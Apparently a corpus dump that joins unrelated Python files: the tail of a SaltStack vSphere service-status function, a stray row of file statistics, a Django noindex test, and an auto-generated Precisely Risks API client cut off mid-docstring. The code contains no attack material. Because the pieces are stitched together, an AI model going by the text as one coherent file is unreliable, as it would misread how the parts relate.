List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to get the service's running state.
If host_names is not provided, the service's running state will be retrieved
for the ``host`` location instead. This is useful for when service instance
connection information is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.get_service_running my.esxi.host root bad-password 'ssh'
# Used for connecting to a vCenter Server
salt '*' vsphere.get_service_running my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = salt.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
host_names = _check_hosts(service_instance, host, host_names)
ret = {}
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
services = host_ref.configManager.serviceSystem.serviceInfo.service
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
# Loop through services until we find a matching name
for service in services:
if service.key == temp_service_name:
ret.update({host_name: {service_name: service.running}})
# We've found a match - break out of the loop so we don't overwrite the
# Updated host_name value with an error message.
break
else:
msg = "Could not find service '{}' for host '{}'.".format(service_name, host_name)
ret.update({host_name: {"Error": msg}})
# If we made it this far, something else has gone wrong.
if ret.get(host_name) is None:
msg = "'vsphere.get_service_running' failed for host {}.".format(host_name)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
return ret
| 30.52867 | 102 | 0.5984 | 3,299 | 26,621 | 4.708396 | 0.073356 | 0.059486 | 0.020923 | 0.027361 | 0.908839 | 0.887401 | 0.881607 | 0.872401 | 0.857078 | 0.850705 | 0 | 0.002551 | 0.322753 | 26,621 | 871 | 103 | 30.56372 | 0.859005 | 0.462342 | 0 | 0.801471 | 0 | 0 | 0.114392 | 0.011797 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0.029412 | 0.019608 | 0.002451 | 0.073529 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
from django.test import TestCase
from django.conf import settings


class TestNoIndex(TestCase):
def test_indexing_is_allowed(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webflow/index.html')
self.assertTrue('<meta name="robots" content="noindex">' not in str(response.content))
self.assertTrue("noindex" not in str(response.content))
response = self.client.get('/infrastructure/projects/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'infrastructure/search.djhtml')
self.assertTrue('<meta name="robots" content="noindex">' not in str(response.content))
self.assertTrue("noindex" not in str(response.content))

    def test_indexing_is_blocked(self):
settings.NO_INDEX = "env_bool"
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webflow/index.html')
self.assertTrue('<meta name="robots" content="noindex">' in str(response.content))
response = self.client.get('/infrastructure/projects/')
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'infrastructure/search.djhtml')
        self.assertTrue('<meta name="robots" content="noindex">' in str(response.content))
"""
Precisely APIs
Enhance & enrich your data, applications, business processes, and workflows with rich location, information, and identify APIs. # noqa: E501
The version of the OpenAPI document: 11.9.3
Generated by: https://openapi-generator.tech
"""
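
# The endpoint definitions below back generated wrapper methods such as
# get_crime_risk_by_address. A minimal usage sketch -- the credential setup and
# the address value here are illustrative assumptions, not part of this module:
#
#     from com.precisely.apis.api.risks_service_api import RisksServiceApi
#     api = RisksServiceApi()  # default ApiClient; OAuth2 must be configured on it
#     response = api.get_crime_risk_by_address(address="<street address>")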
import re # noqa: F401
import sys # noqa: F401
from com.precisely.apis.api_client import ApiClient, Endpoint as _Endpoint
from com.precisely.apis.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from com.precisely.apis.model.crime_risk_by_address_batch_request import CrimeRiskByAddressBatchRequest
from com.precisely.apis.model.crime_risk_by_location_batch_request import CrimeRiskByLocationBatchRequest
from com.precisely.apis.model.crime_risk_response import CrimeRiskResponse
from com.precisely.apis.model.crime_risk_response_list import CrimeRiskResponseList
from com.precisely.apis.model.distance_to_flood_hazard_address_request import DistanceToFloodHazardAddressRequest
from com.precisely.apis.model.distance_to_flood_hazard_location_request import DistanceToFloodHazardLocationRequest
from com.precisely.apis.model.distance_to_flood_hazard_response import DistanceToFloodHazardResponse
from com.precisely.apis.model.earthquake_history import EarthquakeHistory
from com.precisely.apis.model.earthquake_risk_by_address_request import EarthquakeRiskByAddressRequest
from com.precisely.apis.model.earthquake_risk_by_location_request import EarthquakeRiskByLocationRequest
from com.precisely.apis.model.earthquake_risk_response import EarthquakeRiskResponse
from com.precisely.apis.model.earthquake_risk_response_list import EarthquakeRiskResponseList
from com.precisely.apis.model.error_info import ErrorInfo
from com.precisely.apis.model.fire_history import FireHistory
from com.precisely.apis.model.fire_risk_by_address_request import FireRiskByAddressRequest
from com.precisely.apis.model.fire_risk_by_location_request import FireRiskByLocationRequest
from com.precisely.apis.model.fire_risk_response import FireRiskResponse
from com.precisely.apis.model.fire_risk_response_list import FireRiskResponseList
from com.precisely.apis.model.fire_stations import FireStations
from com.precisely.apis.model.flood_risk_by_address_request import FloodRiskByAddressRequest
from com.precisely.apis.model.flood_risk_by_location_request import FloodRiskByLocationRequest
from com.precisely.apis.model.flood_risk_response import FloodRiskResponse
from com.precisely.apis.model.flood_risk_response_list import FloodRiskResponseList
from com.precisely.apis.model.water_body_response import WaterBodyResponse


class RisksServiceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
self.get_crime_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/byaddress',
'operation_id': 'get_crime_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'type',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'type':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'type': 'type',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'type': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_crime_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/byaddress',
'operation_id': 'get_crime_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'crime_risk_by_address_batch_request',
],
'required': [
'crime_risk_by_address_batch_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'crime_risk_by_address_batch_request':
(CrimeRiskByAddressBatchRequest,),
},
'attribute_map': {
},
'location_map': {
'crime_risk_by_address_batch_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_crime_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/bylocation',
'operation_id': 'get_crime_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'type',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'type':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'type': 'type',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'type': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_crime_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (CrimeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/crime/bylocation',
'operation_id': 'get_crime_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'crime_risk_by_location_batch_request',
],
'required': [
'crime_risk_by_location_batch_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'crime_risk_by_location_batch_request':
(CrimeRiskByLocationBatchRequest,),
},
'attribute_map': {
},
'location_map': {
'crime_risk_by_location_batch_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_distance_to_coast_by_address_endpoint = _Endpoint(
settings={
'response_type': (WaterBodyResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/byaddress',
'operation_id': 'get_distance_to_coast_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'max_candidates',
'water_body_type',
'search_distance',
'search_distance_unit',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'max_candidates':
(str,),
'water_body_type':
(str,),
'search_distance':
(str,),
'search_distance_unit':
(str,),
},
'attribute_map': {
'address': 'address',
'max_candidates': 'maxCandidates',
'water_body_type': 'waterBodyType',
'search_distance': 'searchDistance',
'search_distance_unit': 'searchDistanceUnit',
},
'location_map': {
'address': 'query',
'max_candidates': 'query',
'water_body_type': 'query',
'search_distance': 'query',
'search_distance_unit': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_distance_to_coast_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (DistanceToFloodHazardResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/byaddress',
'operation_id': 'get_distance_to_coast_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'distance_to_flood_hazard_address_request',
],
'required': [
'distance_to_flood_hazard_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'distance_to_flood_hazard_address_request':
(DistanceToFloodHazardAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'distance_to_flood_hazard_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_distance_to_coast_by_location_endpoint = _Endpoint(
settings={
'response_type': (WaterBodyResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/bylocation',
'operation_id': 'get_distance_to_coast_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'max_candidates',
'water_body_type',
'search_distance',
'search_distance_unit',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'max_candidates':
(str,),
'water_body_type':
(str,),
'search_distance':
(str,),
'search_distance_unit':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'max_candidates': 'maxCandidates',
'water_body_type': 'waterBodyType',
'search_distance': 'searchDistance',
'search_distance_unit': 'searchDistanceUnit',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'max_candidates': 'query',
'water_body_type': 'query',
'search_distance': 'query',
'search_distance_unit': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_distance_to_coast_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (DistanceToFloodHazardResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/shoreline/distancetofloodhazard/bylocation',
'operation_id': 'get_distance_to_coast_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'distance_to_flood_hazard_location_request',
],
'required': [
'distance_to_flood_hazard_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'distance_to_flood_hazard_location_request':
(DistanceToFloodHazardLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'distance_to_flood_hazard_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_earthquake_history_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeHistory,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquakehistory',
'operation_id': 'get_earthquake_history',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'post_code',
'start_date',
'end_date',
'min_magnitude',
'max_magnitude',
'max_candidates',
],
'required': [
'post_code',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'post_code':
(str,),
'start_date':
(str,),
'end_date':
(str,),
'min_magnitude':
(str,),
'max_magnitude':
(str,),
'max_candidates':
(str,),
},
'attribute_map': {
'post_code': 'postCode',
'start_date': 'startDate',
'end_date': 'endDate',
'min_magnitude': 'minMagnitude',
'max_magnitude': 'maxMagnitude',
'max_candidates': 'maxCandidates',
},
'location_map': {
'post_code': 'query',
'start_date': 'query',
'end_date': 'query',
'min_magnitude': 'query',
'max_magnitude': 'query',
'max_candidates': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_earthquake_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/byaddress',
'operation_id': 'get_earthquake_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'richter_value',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'richter_value':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'richter_value': 'richterValue',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'richter_value': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_earthquake_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/byaddress',
'operation_id': 'get_earthquake_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'earthquake_risk_by_address_request',
],
'required': [
'earthquake_risk_by_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'earthquake_risk_by_address_request':
(EarthquakeRiskByAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'earthquake_risk_by_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_earthquake_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/bylocation',
'operation_id': 'get_earthquake_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'richter_value',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'richter_value':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'richter_value': 'richterValue',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'richter_value': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_earthquake_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (EarthquakeRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/earthquake/bylocation',
'operation_id': 'get_earthquake_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'earthquake_risk_by_location_request',
],
'required': [
'earthquake_risk_by_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'earthquake_risk_by_location_request':
(EarthquakeRiskByLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'earthquake_risk_by_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_fire_history_endpoint = _Endpoint(
settings={
'response_type': (FireHistory,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/firehistory',
'operation_id': 'get_fire_history',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'post_code',
'start_date',
'end_date',
'max_candidates',
],
'required': [
'post_code',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'post_code':
(str,),
'start_date':
(str,),
'end_date':
(str,),
'max_candidates':
(str,),
},
'attribute_map': {
'post_code': 'postCode',
'start_date': 'startDate',
'end_date': 'endDate',
'max_candidates': 'maxCandidates',
},
'location_map': {
'post_code': 'query',
'start_date': 'query',
'end_date': 'query',
'max_candidates': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/byaddress',
'operation_id': 'get_fire_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/byaddress',
'operation_id': 'get_fire_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'fire_risk_by_address_request',
],
'required': [
'fire_risk_by_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'fire_risk_by_address_request':
(FireRiskByAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'fire_risk_by_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.get_fire_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/bylocation',
'operation_id': 'get_fire_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (FireRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/fire/bylocation',
'operation_id': 'get_fire_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'fire_risk_by_location_request',
],
'required': [
'fire_risk_by_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'fire_risk_by_location_request':
(FireRiskByLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'fire_risk_by_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json'
]
},
api_client=api_client
)
self.get_fire_station_by_address_endpoint = _Endpoint(
settings={
'response_type': (FireStations,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/firestation/byaddress',
'operation_id': 'get_fire_station_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'max_candidates',
'travel_time',
'travel_time_unit',
'travel_distance',
'travel_distance_unit',
'sort_by',
'historic_traffic_time_bucket',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'max_candidates':
(str,),
'travel_time':
(str,),
'travel_time_unit':
(str,),
'travel_distance':
(str,),
'travel_distance_unit':
(str,),
'sort_by':
(str,),
'historic_traffic_time_bucket':
(str,),
},
'attribute_map': {
'address': 'address',
'max_candidates': 'maxCandidates',
'travel_time': 'travelTime',
'travel_time_unit': 'travelTimeUnit',
'travel_distance': 'travelDistance',
'travel_distance_unit': 'travelDistanceUnit',
'sort_by': 'sortBy',
'historic_traffic_time_bucket': 'historicTrafficTimeBucket',
},
'location_map': {
'address': 'query',
'max_candidates': 'query',
'travel_time': 'query',
'travel_time_unit': 'query',
'travel_distance': 'query',
'travel_distance_unit': 'query',
'sort_by': 'query',
'historic_traffic_time_bucket': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_fire_station_by_location_endpoint = _Endpoint(
settings={
'response_type': (FireStations,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/firestation/bylocation',
'operation_id': 'get_fire_station_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'max_candidates',
'travel_time',
'travel_time_unit',
'travel_distance',
'travel_distance_unit',
'sort_by',
'historic_traffic_time_bucket',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'max_candidates':
(str,),
'travel_time':
(str,),
'travel_time_unit':
(str,),
'travel_distance':
(str,),
'travel_distance_unit':
(str,),
'sort_by':
(str,),
'historic_traffic_time_bucket':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'max_candidates': 'maxCandidates',
'travel_time': 'travelTime',
'travel_time_unit': 'travelTimeUnit',
'travel_distance': 'travelDistance',
'travel_distance_unit': 'travelDistanceUnit',
'sort_by': 'sortBy',
'historic_traffic_time_bucket': 'historicTrafficTimeBucket',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'max_candidates': 'query',
'travel_time': 'query',
'travel_time_unit': 'query',
'travel_distance': 'query',
'travel_distance_unit': 'query',
'sort_by': 'query',
'historic_traffic_time_bucket': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_flood_risk_by_address_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/byaddress',
'operation_id': 'get_flood_risk_by_address',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'address',
'include_zone_desc',
'include_geometry',
],
'required': [
'address',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'address':
(str,),
'include_zone_desc':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'address': 'address',
'include_zone_desc': 'includeZoneDesc',
'include_geometry': 'includeGeometry',
},
'location_map': {
'address': 'query',
'include_zone_desc': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_flood_risk_by_address_batch_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/byaddress',
'operation_id': 'get_flood_risk_by_address_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'flood_risk_by_address_request',
],
'required': [
'flood_risk_by_address_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'flood_risk_by_address_request':
(FloodRiskByAddressRequest,),
},
'attribute_map': {
},
'location_map': {
'flood_risk_by_address_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
self.get_flood_risk_by_location_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponse,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/bylocation',
'operation_id': 'get_flood_risk_by_location',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'longitude',
'latitude',
'include_zone_desc',
'include_geometry',
],
'required': [
'longitude',
'latitude',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'longitude':
(str,),
'latitude':
(str,),
'include_zone_desc':
(str,),
'include_geometry':
(str,),
},
'attribute_map': {
'longitude': 'longitude',
'latitude': 'latitude',
'include_zone_desc': 'includeZoneDesc',
'include_geometry': 'includeGeometry',
},
'location_map': {
'longitude': 'query',
'latitude': 'query',
'include_zone_desc': 'query',
'include_geometry': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [],
},
api_client=api_client
)
self.get_flood_risk_by_location_batch_endpoint = _Endpoint(
settings={
'response_type': (FloodRiskResponseList,),
'auth': [
'oAuth2Password'
],
'endpoint_path': '/risks/v1/flood/bylocation',
'operation_id': 'get_flood_risk_by_location_batch',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'flood_risk_by_location_request',
],
'required': [
'flood_risk_by_location_request',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'flood_risk_by_location_request':
(FloodRiskByLocationRequest,),
},
'attribute_map': {
},
'location_map': {
'flood_risk_by_location_request': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'application/xml'
],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client
)
def get_crime_risk_by_address(
self,
address,
**kwargs
):
"""Get Crime Risk By Address # noqa: E501
Accepts an address as input and returns local crime indexes. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_crime_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): free form address text
Keyword Args:
type (str): the crime type; valid values are the 11 supported crime types, with 'all' as the default (more than one can be given as a comma-separated list). [optional]
include_geometry (str): Y or N (default is N); if Y, the geometry is included in the response. [optional]
_return_http_data_only (bool): return the response data only, without
the HTTP status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it is the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
